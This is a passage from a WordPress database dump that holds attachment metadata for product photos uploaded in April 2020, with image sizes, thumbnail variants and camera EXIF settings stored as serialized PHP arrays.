\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:20:\"IMG_0006-600x920.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:920;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0006-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:14:\"Canon EOS 200D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1517452294\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"105\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:6:\"0.0125\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(11932,4929,'_wp_attached_file','2020/04/IMG_0007.jpg'),(11933,4929,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:561;s:6:\"height\";i:875;s:4:\"file\";s:20:\"2020/04/IMG_0007.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"IMG_0007-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0007-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_0007-192x300.jpg\";s:5:\"width\";i:192;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0007-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:20:\"IMG_0007-561x300.jpg\";s:5:\"width\";i:561;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:20:\"IMG_0007-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:20:\"IMG_0007-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:20:\"IMG_0007-561x550.jpg\";s:5:\"width\";i:561;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:20:\"IMG_0007-550x875.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:875;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:20:\"IMG_0007-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0007-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:14:\"Canon EOS 200D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1492830929\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:5:\"0.025\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(11934,4930,'_wp_attached_file','2020/04/IMG_0008.jpg'),(11935,4930,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1136;s:6:\"height\";i:1704;s:4:\"file\";s:20:\"2020/04/IMG_0008.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"IMG_0008-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0008-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:20:\"IMG_0008-600x900.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:900;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_0008-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"IMG_0008-683x1024.jpg\";s:5:\"width\";i:683;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0008-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"IMG_0008-768x1152.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:20:\"IMG_0008-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:20:\"IMG_0008-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:22:\"IMG_0008-1024x1536.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:20:\"IMG_0008-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:21:\"IMG_0008-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:21:\"IMG_0008-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:22:\"IMG_0008-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:20:\"IMG_0008-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:20:\"IMG_0008-600x900.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:900;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0008-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"1.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1483865247\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:5:\"0.002\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(11936,4931,'_wp_attached_file','2020/04/IMG_0009.jpg'),(11937,4931,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:724;s:6:\"height\";i:1086;s:4:\"file\";s:20:\"2020/04/IMG_0009.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"IMG_0009-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0009-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:20:\"IMG_0009-600x900.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:900;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_0009-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"IMG_0009-683x1024.jpg\";s:5:\"width\";i:683;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0009-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:20:\"IMG_0009-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:20:\"IMG_0009-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:20:\"IMG_0009-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:20:\"IMG_0009-724x550.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:21:\"IMG_0009-550x1086.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:20:\"IMG_0009-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:20:\"IMG_0009-600x900.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:900;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0009-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:14:\"Canon EOS 200D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1502926128\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:5:\"0.005\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(11938,4932,'_wp_attached_file','2020/04/IMG_0011.jpg'),(11939,4932,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1536;s:6:\"height\";i:2306;s:4:\"file\";s:20:\"2020/04/IMG_0011.jpg\";s:5:\"sizes\";a:18:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"IMG_0011-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0011-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:20:\"IMG_0011-600x901.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:901;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_0011-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"IMG_0011-682x1024.jpg\";s:5:\"width\";i:682;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0011-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"IMG_0011-768x1153.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1153;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:20:\"IMG_0011-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:20:\"IMG_0011-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:22:\"IMG_0011-1023x1536.jpg\";s:5:\"width\";i:1023;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:22:\"IMG_0011-1364x2048.jpg\";s:5:\"width\";i:1364;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:20:\"IMG_0011-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:21:\"IMG_0011-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:21:\"IMG_0011-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:22:\"IMG_0011-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:20:\"IMG_0011-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:20:\"IMG_0011-600x901.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:901;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0011-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:14:\"Canon EOS 200D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1494979239\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:7:\"0.00625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(11940,4933,'_wp_attached_file','2020/04/IMG_0012.jpg'),(11941,4933,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1537;s:6:\"height\";i:2305;s:4:\"file\";s:20:\"2020/04/IMG_0012.jpg\";s:5:\"sizes\";a:18:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"IMG_0012-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0012-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:20:\"IMG_0012-600x900.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:900;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_0012-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"IMG_0012-683x1024.jpg\";s:5:\"width\";i:683;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0012-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"IMG_0012-768x1152.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:20:\"IMG_0012-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:20:\"IMG_0012-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:22:\"IMG_0012-1024x1536.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:22:\"IMG_0012-1366x2048.jpg\";s:5:\"width\";i:1366;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:20:\"IMG_0012-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:21:\"IMG_0012-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:21:\"IMG_0012-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:22:\"IMG_0012-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:20:\"IMG_0012-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:20:\"IMG_0012-600x900.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:900;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0012-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:14:\"Canon EOS 200D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1540365787\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:4:\"0.01\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(11942,4934,'_wp_attached_file','2020/04/IMG_0016.jpg'),(11943,4934,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1537;s:6:\"height\";i:2151;s:4:\"file\";s:20:\"2020/04/IMG_0016.jpg\";s:5:\"sizes\";a:18:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"IMG_0016-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0016-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:20:\"IMG_0016-600x840.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:840;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_0016-214x300.jpg\";s:5:\"width\";i:214;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"IMG_0016-732x1024.jpg\";s:5:\"width\";i:732;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0016-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"IMG_0016-768x1075.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1075;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:20:\"IMG_0016-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:20:\"IMG_0016-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:22:\"IMG_0016-1098x1536.jpg\";s:5:\"width\";i:1098;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:22:\"IMG_0016-1463x2048.jpg\";s:5:\"width\";i:1463;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:20:\"IMG_0016-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:21:\"IMG_0016-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:21:\"IMG_0016-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:22:\"IMG_0016-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:20:\"IMG_0016-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:20:\"IMG_0016-600x840.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:840;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0016-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:14:\"Canon EOS 200D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1504056686\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:7:\"0.00625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(11944,4935,'_wp_attached_file','2020/04/IMG_0017.jpg'),(11945,4935,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1537;s:6:\"height\";i:2305;s:4:\"file\";s:20:\"2020/04/IMG_0017.jpg\";s:5:\"sizes\";a:18:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"IMG_0017-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0017-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:20:\"IMG_0017-600x900.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:900;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_0017-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"IMG_0017-683x1024.jpg\";s:5:\"width\";i:683;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_0017-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"IMG_0017-768x1152.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:20:\"IMG_0017-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:20:\"IMG_0017-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:22:\"IMG_0017-1024x1536.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:22:\"IMG_0017-1366x2048.jpg\";s:5:\"width\";i:1366;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:20:\"IMG_0017-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:21:\"IMG_0017-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:21:\"IMG_0017-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:22:\"IMG_0017-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\"